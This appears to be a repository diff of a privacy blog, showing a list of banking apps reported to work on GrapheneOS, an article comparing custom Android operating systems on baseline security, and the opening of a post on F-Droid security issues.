||||
|
||||
### Hungary
|
||||
|
||||
- [UniCredit mBanking](https://play.google.com/store/apps/details?id=hr.asseco.android.jimba.mUCI.hu&hl=en&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/87)
|
||||
|
||||
### India
|
||||
|
||||
- [Axis Mobile](https://play.google.com/store/apps/details?id=com.axis.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/139)
|
||||
- [BHIM](https://play.google.com/store/apps/details?id=in.org.npci.upiapp) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/135)
|
||||
- [Cent Mobile](https://play.google.com/store/apps/details?id=com.infrasofttech.CentralBank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/142)
|
||||
- [HDFC Bank](https://play.google.com/store/apps/details?id=com.snapwork.hdfc) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/138)
|
||||
- [Kotak - 811 & Mobile Banking](https://play.google.com/store/apps/details?id=com.msf.kbank.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/137)
|
||||
- [PhonePe](https://play.google.com/store/apps/details?id=com.phonepe.app) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/134)
|
||||
- [Paytm](https://play.google.com/store/apps/details?id=net.one97.paytm) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/140)
|
||||
- [Union Bank of India - nxt](https://play.google.com/store/apps/details?id=com.infrasoft.uboi) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/141)
|
||||
- [YONO SBI](https://play.google.com/store/apps/details?id=com.sbi.lotusintouch&hl=en_IN&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/79)
|
||||
|
||||
### Italy
|
||||
|
||||
- [BNL](https://play.google.com/store/apps/details?id=it.bnl.apps.banking) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/144)
|
||||
- [Fineco](https://play.google.com/store/apps/details?id=com.fineco.it) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/131)
|
||||
|
||||
### Kazakhstan
|
||||
- [Kaspi.kz](https://play.google.com/store/apps/details?id=kz.kaspi.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/149)
|
||||
|
||||
### Lithuania
|
||||
|
||||
- [Revolut](https://play.google.com/store/apps/details?id=com.revolut.revolut) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/90)
|
||||
|
||||
### Netherlands
|
||||
|
||||
- [ABN AMRO](https://play.google.com/store/apps/details?id=com.abnamro.nl.mobile.payments) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/108)
|
||||
- [ASN Bank](https://play.google.com/store/search?q=asn%20bank&c=apps&hl=nl&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/105)
|
||||
- [Rabobank](https://play.google.com/store/apps/details?id=nl.rabomobiel) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/47)
|
||||
- [Triodos Bankieren NL](https://play.google.com/store/apps/details?id=com.triodos.bankingnl) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/133)
|
||||
|
||||
### Norway
|
||||
|
||||
- [Bank Norwegian](https://play.google.com/store/search?q=bank+norwegian&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/95)
|
||||
- [DNB Spare](https://play.google.com/store/search?q=dnb+spare+app&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/98)
|
||||
- [Engangskode sparebank 1](https://play.google.com/store/search?q=engangskode+sparebank+1&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/100)
|
||||
- [Kron](https://play.google.com/store/search?q=kron&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/97)
|
||||
- [Nordnet](https://play.google.com/store/search?q=nordnet&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/99)
|
||||
- [Sbanken](https://play.google.com/store/search?q=Sbanken&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/96)
|
||||
- [Trumf Visa](https://play.google.com/store/search?q=trumf+visa&c=apps) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/101)
|
||||
- [Vipps](https://play.google.com/store/apps/details?id=no.dnb.vipps&hl=en&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/74)
|
||||
|
||||
### Poland
|
||||
|
||||
- [IKO](https://play.google.com/store/apps/details?id=pl.pkobp.iko) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/25)
|
||||
- [mBank PL](https://play.google.com/store/apps/details?id=pl.mbank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/136)
|
||||
|
||||
### Portugal
|
||||
|
||||
- [Caixadirecta Empresas](https://play.google.com/store/apps/details?id=pt.cgd.caixadirectaempresas) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/120)
|
||||
|
||||
### Romania
|
||||
|
||||
- [BT Pay — Banca Transilvania](https://play.google.com/store/apps/details?id=ro.btrl.pay) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/83)
|
||||
- [Raiffeisen Smart Mobile PI](https://play.google.com/store/apps/details?id=ro.raiffeisen.smartmobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/86)
|
||||
|
||||
### Serbia
|
||||
|
||||
- [Moja mBanka Raiffeisen](https://play.google.com/store/apps/details?id=rs.Raiffeisen.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/70)
|
||||
|
||||
### Singapore
|
||||
|
||||
- [OCBC Digital](https://play.google.com/store/apps/details?id=com.ocbc.mobile&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/146)
|
||||
|
||||
### Spain
|
||||
|
||||
- [Evo Banco](https://play.google.com/store/apps/details?id=es.evobanco.bancamovil) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/112)
|
||||
|
||||
### Sweden
|
||||
|
||||
- [Avanza](https://play.google.com/store/apps/details?id=se.avanzabank.androidapplikation) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/11)
|
||||
- [BankID säkerhetsapp](https://play.google.com/store/apps/details?id=com.bankid.bus) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/8)
|
||||
- [Länsförsäkringar](https://play.google.com/store/apps/details?id=se.lf.mobile.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/91)
|
||||
- [Mobilbank SE — Danske Bank](https://play.google.com/store/apps/details?id=com.danskebank.mobilebank3.se) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/4)
|
||||
- [Nordea Mobile — Sverige](https://play.google.com/store/apps/details?id=se.nordea.mobilebank&hl=sv&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/9)
|
||||
- [Swedbank private](https://play.google.com/store/apps/details?id=se.swedbank.mobil) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/12)
|
||||
- [Swish payments](https://play.google.com/store/apps/details?id=se.bankgirot.swish) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/6)
|
||||
|
||||
### Switzerland
|
||||
|
||||
- [BCN Mobile banking](https://play.google.com/store/apps/details?id=com.bcn.android.mbanking) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/145)
|
||||
- [Credit Suisse](https://play.google.com/store/apps/details?id=com.csg.cs.dnmb) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/72)
|
||||
- [Raiffeisen E-Banking](https://play.google.com/store/apps/details?id=ch.raiffeisen.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/26)
|
||||
- [ZKB Access](https://play.google.com/store/apps/details?id=ch.zkb.digipass) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/94)
|
||||
- [ZKB Mobile Banking](https://play.google.com/store/apps/details?id=ch.zkb.slv.mobile.client.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/93)
|
||||
|
||||
### Taiwan
|
||||
|
||||
- [Cathay United Bank](https://play.google.com/store/apps/details?id=com.cathaybk.mymobibank.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/29)
|
||||
- [Chunghwa Post](https://play.google.com/store/apps/details?id=com.mitake.android.epost) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/27)
|
||||
- [CTBC Bank Home Bank](https://play.google.com/store/apps/details?id=com.chinatrust.mobilebank) -[Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/30)
|
||||
- [E.Sun Bank](https://play.google.com/store/apps/details?id=com.esunbank&hl=zh_TW&gl=US) -[Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/162)
|
||||
- [Taishin International Bank](https://play.google.com/store/apps/details?id=tw.com.taishinbank.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/28)
|
||||
|
||||
### Ukraine
|
||||
|
||||
- [Privat24](https://play.google.com/store/apps/details?id=ua.privatbank.ap24) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/124)
|
||||
|
||||
### United Arab Emirates
|
||||
|
||||
- [ADCB](https://play.google.com/store/apps/details?id=com.adcb.bank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/123)
|
||||
|
||||
### United Kingdom
|
||||
|
||||
- [Amex United Kingdom](https://play.google.com/store/apps/details?id=com.americanexpress.android.acctsvcs.uk) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/40)
|
||||
- [Barclaycard](https://play.google.com/store/apps/details?id=com.barclays.bca) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/42)
|
||||
- [Chase UK](https://play.google.com/store/apps/details?id=com.chase.intl) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/69)
|
||||
- [First Direct](https://play.google.com/store/apps/details?id=com.firstdirect.bankingonthego&gl=UK) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/128)
|
||||
- [HSBC UK Mobile Banking](https://play.google.com/store/apps/details?id=uk.co.hsbc.hsbcukmobilebanking&hl=en) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/33)
|
||||
- [Lloyds Bank Mobile Banking](https://play.google.com/store/apps/details?id=com.grppl.android.shell.CMBlloydsTSB73) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/53)
|
||||
- [Monzo Bank](https://play.google.com/store/apps/details?id=co.uk.getmondo) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/58)
|
||||
- [Revolut](https://play.google.com/store/apps/details?id=com.revolut.revolut) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/90)
|
||||
- [Starling Bank - Mobile Banking](https://play.google.com/store/apps/details?id=com.starlingbank.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/39)
|
||||
- [Tesco Bank](https://play.google.com/store/apps/details?id=com.tescobank.mobile&gl=UK) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/129)
|
||||
- [Triodos Bank UK](https://play.google.com/store/apps/details?id=com.triodos.bankinguk) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/132)
|
||||
- [TSB Internet Banking](https://play.google.com/store/apps/details?id=uk.co.tsb.newmobilebank&hl=en_GB&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/143)
|
||||
- [Virgin Money Mobile Banking](https://play.google.com/store/apps/details?id=com.virginmoney.uk.mobile.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/54)
|
||||
|
||||
### United States
|
||||
|
||||
- [Alliant Mobile Banking](https://play.google.com/store/apps/details?id=org.alliant.mobile&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/85)
|
||||
- [Ally: Banking & Investing](https://play.google.com/store/apps/details?id=com.ally.MobileBanking&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/113)
|
||||
- [America First Mobile Banking](https://play.google.com/store/apps/details?id=com.afcu.mobilebanking) - [Report](https://play.google.com/store/apps/details?id=com.afcu.mobilebanking)
|
||||
- [American Express](https://play.google.com/store/apps/details?id=com.americanexpress.android.acctsvcs.us) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/125)
|
||||
- [BECU](https://play.google.com/store/apps/details?id=org.becu.androidapp&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/60)
|
||||
- [Capital One Mobile](https://play.google.com/store/apps/details?id=com.konylabs.capitalone&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/107)
|
||||
- [Chase Mobile](https://play.google.com/store/appds/details?id=com.chase.sig.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/13)
|
||||
- [Chime Mobile Banking](https://play.google.com/store/apps/details?id=com.onedebit.chime&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/46)
|
||||
- [Citizens Bank Mobile](https://play.google.com/store/apps/details?id=com.citizensbank.androidapp) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/66)
|
||||
- [CommunityAmerica Mobile](https://play.google.com/store/apps/details?id=com.ifs.banking.fiid1454) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/154)
|
||||
- [DCU Digital Banking](https://play.google.com/store/apps/details?id=com.projectfinance.android.dcu) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/67)
|
||||
- [Discover Mobile](https://play.google.com/store/apps/details?id=com.discoverfinancial.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/64)
|
||||
- [Fidelity Investments](https://play.google.com/store/apps/details?id=com.fidelity.android) - [Repor](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/65)
|
||||
- [Fifth Third Mobile Banking](https://play.google.com/store/apps/details?id=com.clairmail.fth) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/41)
|
||||
- [First Merchants Mobile](https://play.google.com/store/apps/details?id=com.mfoundry.mb.android.mb_lx7) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/158)
|
||||
- [Greenstate CU Mobile](https://play.google.com/store/apps/details?id=com.q2e.universityofiowacommunitycreditunion5086.mobile.production&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/122)
|
||||
- [Grow Mobile Banking](https://play.google.com/store/apps/details?id=com.growfinancialfcu.growfinancialfcu&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/68)
|
||||
- [GTE Mobile](https://play.google.com/store/apps/details?id=org.gtefinancial.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/81)
|
||||
- [GTE Cards (GTE Financial - Debit/Credit card management)](https://play.google.com/store/apps/details?id=com.a84102934.wallet.cardcontrol) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/82)
|
||||
- [Mainstreet Credit Union](https://play.google.com/store/apps/details?id=org.mainstreetcu.grip) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/111)
|
||||
- [SchoolsFirst FCU Mobile](https://play.google.com/store/apps/details?id=org.schoolsfirstfcu.mobile.banking.isam) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/126)
|
||||
- [Schwab Mobile](https://play.google.com/store/apps/details?id=com.schwab.mobile&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/61)
|
||||
- [Texan CU Mobile](https://play.google.com/store/apps/details?id=com.ifs.banking.fiid1373) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/56)
|
||||
- [USAA Mobile](https://play.google.com/store/apps/details?id=com.usaa.mobile.android.usaa&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/80)
|
||||
- [U.S. Bank Mobile](https://play.google.com/store/apps/details?id=com.usbank.mobilebanking&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/84)
|
||||
- [Wells Fargo Mobile](https://play.google.com/store/apps/details?id=com.wf.wellsfargomobile&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/63)
|
||||
|
||||
---
|
||||
## List of Submitted Banking Apps
|
||||
|
||||
Here you will find a current list of submitted Banking Apps that work on GrapheneOS via this projects [issue-tracker](https://github.com/akc3n/banking/issues).
|
||||
|
||||
## Submit a Banking App
|
||||
|
||||
**Report a banking app's compatibility on GrapheneOS**
|
||||
|
||||
Please use this issue form to submit a report on the banking app that you use on GrapheneOS:
|
||||
|
||||
**[SUBMIT REPORT](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/new?assignees=&labels=&template=app_report.yml)**
|
||||
|
||||
---
|
||||
|
||||
## Notes
|
||||
|
||||
If you have any issues with what is listed on this site or about this project page, you may open an issue on this [issue-tracker](https://github.com/PrivSec-dev/banking-apps-compat-report/issues).
|
||||
|
||||
- GrapheneOS has a [detailed guide](https://grapheneos.org/articles/attestation-compatibility-guide) for app developers on how to support GrapheneOS with the hardware attestation API. Direct use of the hardware attestation API provides much higher assurance than using SafetyNet so these apps have nothing to lose by using a more meaningful API and supporting a more secure OS.
|
||||
|
||||
> GrapheneOS users are strongly encouraged to share this documentation with app developers enforcing only being able to use the stock OS. Send an email to the developers and leave a review of the app with a link to this information. Share it with other users and create pressure to support GrapheneOS rather than locking users into the stock OS without a valid security reason. GrapheneOS not only upholds the app security model but substantially reinforces it, so it cannot be justified with reasoning based on security, anti-fraud, etc.
|
||||
|
||||
[^1]: [GrapheneOS Banking apps - paras. 3, ln. 2](https://grapheneos.org/usage#banking-apps)
|
|
@ -0,0 +1,109 @@
|
|||
---
|
||||
title: "Choosing Your Android-Based Operating System"
|
||||
date: 2022-07-18
|
||||
tags: ['Operating Systems', 'Android', 'Privacy', 'Security']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||
Android is a secure operating system that has strong [app sandboxing](https://source.android.com/security/app-sandbox), [Verified Boot](https://source.android.com/security/verifiedboot) (AVB), and a robust [permission](https://developer.android.com/guide/topics/permissions/overview) control system.
|
||||
|
||||
When you buy an Android phone, the device's default operating system often comes with invasive integration with apps and services that are not part of the [Android Open-Source Project](https://source.android.com/). An example of such is Google Play Services, which has irrevocable privileges to access your files, contacts storage, call logs, SMS messages, location, camera, microphone, hardware identifiers, and so on. These apps and services increase the attack surface of your device and are the source of various privacy concerns with Android.
|
||||
|
||||
This problem could be solved by using a custom Android-based operating system that does not come with such invasive integration. Unfortunately, many custom Android-based operating systems often violate the Android security model by not supporting critical security features such as AVB, rollback protection, firmware updates, and so on. Some of them also ship [`userdebug`](https://source.android.com/setup/build/building#choose-a-target) builds which expose root over [ADB](https://developer.android.com/studio/command-line/adb) and require [more permissive](https://github.com/LineageOS/android_system_sepolicy/search?q=userdebug&type=code) SELinux policies to accommodate debugging features, resulting in a further increased attack surface and weakened security model.
|
||||
|
||||
When choosing a custom Android-based operating system, you should make sure that it upholds the Android security model. Ideally, the custom operating system should have substantial privacy and security improvements to justify adding yet another party to trust.
|
||||
|
||||
## Baseline Security
|
||||
|
||||
### Verified Boot
|
||||
|
||||

|
||||
|
||||
[Verified Boot](https://source.android.com/security/verifiedboot) is an important part of the Android security model. It provides protection against [evil maid](https://en.wikipedia.org/wiki/Evil_maid_attack) attacks, malware persistence, and ensures security updates cannot be downgraded with [rollback protection](https://source.android.com/security/verifiedboot/verified-boot#rollback-protection).
|
||||
|
||||
On Android, only your data (inside of the /data partition) is encrypted, and the operating system files are left unencrypted. Verified Boot ensures the integrity of the operating system files, thereby preventing an adversary with physical access from tampering or installing malware on the device. In the unlikely case that malware is able to exploit other parts of the system and gain higher privileged access, Verified Boot will prevent and revert changes to the system partition upon rebooting the device.
|
||||
|
||||
Unfortunately, OEMs are only obliged to support Verified Boot on their stock Android distribution. Only a few OEMs such as Google support custom AVB key enrollment on their devices. Additionally, some AOSP derivatives such as LineageOS or /e/ OS do not support Verified Boot even on hardware with Verified Boot support for third-party operating systems. These AOSP derivatives should be avoided at all cost.
|
||||
|
||||
### Firmware Updates
|
||||
|
||||
Firmware updates are critical for maintaining security and without them your device cannot be secure. OEMs have support agreements with their partners to provide the closed-source components for a limited support period. These are detailed in the monthly [Android Security Bulletins](https://source.android.com/security/bulletin).
|
||||
|
||||
On a custom Android distribution, it is the responsibility of the operating system vendor to extract the firmware from the stock operating system, test it against their Android builds, then ship them to the user.
|
||||
|
||||
Unfortunately, many custom Android distributions, including extremely popular ones like LineageOS and /e/ OS do not ship firmware updates for most of their supported device. Instead, they expect the user to keep track of stock OS updates, extract and flash the firmware themselves. Beyond the lack of testing, this is extremely burdensome and not feasible for most end users and is yet another reason to not use these distributions.
|
||||
|
||||
### Patch Levels
|
||||
|
||||
As the [Android Security Bulletins](https://source.android.com/security/bulletin) is updated every month, Android-Based operating systems are expected to apply all security fixes before the next bulletin update comes out. Beside extracting the firmware, testing it and shipping it to the end user as described [above](#firmware-updates), the AOSP based system also need to be updated.
|
||||
|
||||
This is a particularly challenging thing to do, especially around the time of a new major Android release since there are a lot of changes. Sometimes, newer firmware versions require newer major versions of AOSP, and if the developer takes too long to update their base operating system to the next major AOSP version, they cannot ship firmware updates either, leaving users vulnerable.
|
||||
|
||||
This has happened to CalyxOS during the Android 11 to Android 12 transition. It took them [4 months](https://github.com/privacyguides/privacyguides.org/pull/578#issue-1112002737) to update to Android 12; and during those 4 months, they could not ship any firmware updates at all, leaving the user vulnerable during that time period.
|
||||
|
||||
It would be much better if you just stick to the stock operating system (which got updated to Android 12 shortly after the AOSP 12 release) instead of using a custom operating system which could not keep up with updates as described.
|
||||
|
||||
### Chromium Webview Updates
|
||||
|
||||
Android comes with a system [webview](https://developer.android.com/reference/android/webkit/WebView), a component that many apps rely on to use as part of their activity layout. It effectively behaves like a minimal browser, opening random websites with arbitrary code the internet. Thus, it is very important that this component is consistently kept up to dater.
|
||||
|
||||
Some Android-based operating systems, including ones like CalyxOS, often fall behind on security updates for this component. Particularly, this has gotten so bad that they actually fell behind for [3 months](https://github.com/privacyguides/privacyguides.org/pull/548#issuecomment-1018245074) back in January 2022 and [2 months](https://github.com/privacyguides/privacyguides.org/pull/1378) in June 2022. It is a good indication that these operating systems cannot keep up with security updates and should not be used.
|
||||
|
||||
### User Builds
|
||||
|
||||
As mentioned [above](/posts/os/choosing-your-android-based-operating-system/), `userdebug` builds expose root over ADB and require more permissive SELinux policies to accommodate debugging features. `userdebug` builds violate the Android security model and are really only meant for developers to test out their android builds during development.
|
||||
|
||||
End users should be using the production `user` builds, and any distributions that fail to deliver them like LineageOS or /e/ OS should be avoided.
|
||||
|
||||
### SELinux in Enforcing Mode
|
||||
|
||||
[SELinux](https://source.android.com/security/selinux) is a critical part of the Android security model, having the Linux kernel enforcing confinement for all processes, including system processes running as root.
|
||||
|
||||
In order for a system to be secure, it must have SELinux in Enforcing mode, accompanied by fine-grained SELinux policies.
|
||||
|
||||
Unfortunately, many custom Android-based operating system builds (especially unofficial LineageOS builds) disables SELinux or set it into Permissive mode. You can check whether SELinux is in enforcing mode or not by executing `getenforce` in the ADB shell (the expected output is `Enforcing`). You should avoid any Android-based operating system builds that do not have SELinux in enforcing mode at all cost.
|
||||
|
||||

|
||||
|
||||
## Recommended Android-Based Operating Systems
|
||||
|
||||
Currently, I am only aware of two Android-based operating systems that should be used over the stock operating systems:
|
||||
|
||||
### GrapheneOS
|
||||

|
||||
|
||||
[GrapheneOS](https://grapheneos.org) is the **only** custom Android-based operating system you should buy a new phone for. It provides additional [security hardening](https://en.wikipedia.org/wiki/Hardening_(computing)) and privacy improvements over the stock operating system from Google. It has a [hardened memory allocator](https://github.com/GrapheneOS/hardened_malloc), network and sensor permissions, and various other [security feature](https://grapheneos.org/features). GrapheneOS also comes with full firmware updates and signed builds, so verified boot is fully supported. Here is a quick video demonstrating the network and sensors permissions:
|
||||
|
||||
{{< youtube id="hx2eiPTe7Zg">}}
|
||||
|
||||
For usability purposes, GrapheneOS supports [Sandboxed Google Play](https://grapheneos.org/usage#sandboxed-google-play), which runs Google Play Services fully sandboxed like any other regular app. This means you can take advantage of most Google Play Services, such as [push notifications](https://firebase.google.com/docs/cloud-messaging/), while giving you full control over their permissions and access, and while containing them to a specific work profile or user profile of your choice. Most interestingly, the [In-app Billing API](https://android-doc.github.io/google/play/billing/api.html), [Google Play Games](https://play.google.com/googleplaygames), [Play Asset Delivery](https://developer.android.com/guide/playcore/asset-delivery), [FIDO2](/posts/knowledge/multi-factor-authentication/#fido2-fast-identity-online) all work exceptionally well. Most [Advanced Protection Program](https://landing.google.com/advancedprotection/) features, except for [Play Protect](https://support.google.com/googleplay/answer/2812853?hl=en) and restricted app installation, also work.
|
||||
|
||||
Because GrapheneOS does not grant any Google Apps and Services apart from the opt-in eSIM action app privileged access to the system, Play Protect cannot disable or uninstall known malicious applications when it detects them. As for restricted app installation, this feature is not that useful on stock operating system anyways, since it is bypassable with `adb push`.
|
||||
|
||||
Recently, GrapheneOS has also added the [Storage Scopes](https://grapheneos.org/usage#storage-access) feature, allowing you to force apps that request broad storage access permission to function with scoped storage. With this new feature, you no longer have to grant certain apps access to all of your media or files to use them anymore. You can watch a video of Storage Scope in action here:
|
||||
|
||||
{{< youtube id="WjrANjvrSzw">}}
|
||||
|
||||
|
||||
Currently, Google Pixel phones are the only devices that meet GrapheneOS's [hardware security requirements](https://grapheneos.org/faq#device-support).
|
||||
|
||||
### DivestOS
|
||||
|
||||
[DivestOS](https://divestos.org/) is a great aftermarket operating system for devices that have gone end-of-life or are near end-of-life. Note that this is a harm reduction project, ran by one developer on the best effort basis, and you should not buy a new device just to run DivestOS.
|
||||
|
||||
Being a soft-fork of [LineageOS](https://lineageos.org/), DivestOS inherits many [supported devices](https://divestos.org/index.php?page=devices&base=LineageOS) from LineageOS. It has signed builds, making it possible to have [verified boot](https://source.android.com/security/verifiedboot) on some non-Pixel devices.
|
||||
|
||||
It comes with substantial hardening over AOSP. DivestOS has automated kernel vulnerability ([CVE](https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures)) [patching](https://gitlab.com/divested-mobile/cve_checker), fewer proprietary blobs, a custom [hosts](https://divested.dev/index.php?page=dnsbl) file, and various security features ported from GrapheneOS. A non-exhaustive list of this includes:
|
||||
|
||||
- A hardened webview. [Mulch](https://gitlab.com/divested-mobile/mulch) comes with *some* patches from GrapheneOS's Vanadium browser and the [Bromite](https://github.com/bromite/bromite) project. It gets updated fairly quickly and do not fall behind nearly as much as Bromite.
|
||||
- Kernel patches from GrapheneOS and enables all available kernel security features via [defconfig hardening](https://github.com/Divested-Mobile/DivestOS-Build/blob/master/Scripts/Common/Functions.sh#L758). All kernels newer than version 3.4 include full page [sanitization](https://lwn.net/Articles/334747/) and all ~22 Clang-compiled kernels have [`-ftrivial-auto-var-init=zero`](https://reviews.llvm.org/D54604?id=174471) enabled.
|
||||
- GrapheneOS's [`INTERNET`](https://developer.android.com/training/basics/network-ops/connecting) and SENSORS permission toggle.
|
||||
- [Hardened memory allocator](https://github.com/GrapheneOS/hardened_malloc)
|
||||
- [Secure Exec-Spawning](https://grapheneos.org/usage#exec-spawning)
|
||||
- Partial [bionic](https://en.wikipedia.org/wiki/Bionic_(software)) hardening patchsets from GrapheneOS
|
||||
- GrapheneOS's per-network full [MAC randomization](https://en.wikipedia.org/wiki/MAC_address#Randomization) option on version 17.1 and higher
|
||||
- Automatic reboot/Wi-Fi/Bluetooth [timeout options](https://grapheneos.org/features)
|
||||
|
||||
With that being said, DivestOS is not without its faults. The developer does not have all of the devices he is building for, and for a lot of them he simply publishes the builds blind without actually testing them. Firmware update support [varies](https://gitlab.com/divested-mobile/firmware-empty/-/blob/master/STATUS) across devices. DivestOS also takes a very long time to update to a new major Android, and actually took longer than CalyxOS did as mentioned [above](#firmware-updates). It does not tend to fall behind on Chromium updates like CalyxOS, however.
|
||||
|
||||
Also, please note that I am only recommending DivestOS here, and not any of its related apps. For instance, I would not recommend using Mull, since it is just a Firefox Android fork with better defaults and still inherits many security deficiencies from its upstream, including the lack of support for [site isolation](https://wiki.mozilla.org/Project_Fission) and [isolatedProcess](https://bugzilla.mozilla.org/show_bug.cgi?id=1565196).
|
215
content/posts/android/F-Droid Security Issues.md
Normal file
215
content/posts/android/F-Droid Security Issues.md
Normal file
|
@ -0,0 +1,215 @@
|
|||
---
|
||||
title: "F-Droid Security Issues"
|
||||
date: 2022-01-02T21:28:31Z
|
||||
tags: ['Applications', 'Android', 'Security']
|
||||
author: Wonderfall
|
||||
canonicalURL: https://wonderfall.dev/fdroid-issues
|
||||
ShowCanonicalLink: true
|
||||
---
|
||||
|
||||
F-Droid is a popular alternative app repository for Android, especially known for its main repository dedicated to free and open-source software. F-Droid is often recommended among security and privacy enthusiasts, but how does it stack up against Play Store in practice? This write-up will attempt to emphasize major security issues with F-Droid that you should consider.
|
||||
|
||||
Before we start, a few things to keep in mind:
|
||||
|
||||
- The main goal of this write-up was to inform users so they can make responsible choices, not to trash someone else's work. I have respect for any work done in the name of good intentions. Likewise, please don't misinterpret the intentions of this article.
|
||||
- You have your own reasons for using open-source or free/libre/whatever software which won't be discussed here. A development model shouldn't be an excuse for bad practices and shouldn't lure you into believing that it can provide strong guarantees it cannot.
|
||||
- A lot of information in this article is sourced from official and trusted sources, but you're welcome to do your own research.
|
||||
- These analyses do not account for threat models and personal preferences. As the author of this article, I'm only interested in facts and not ideologies.
|
||||
|
||||
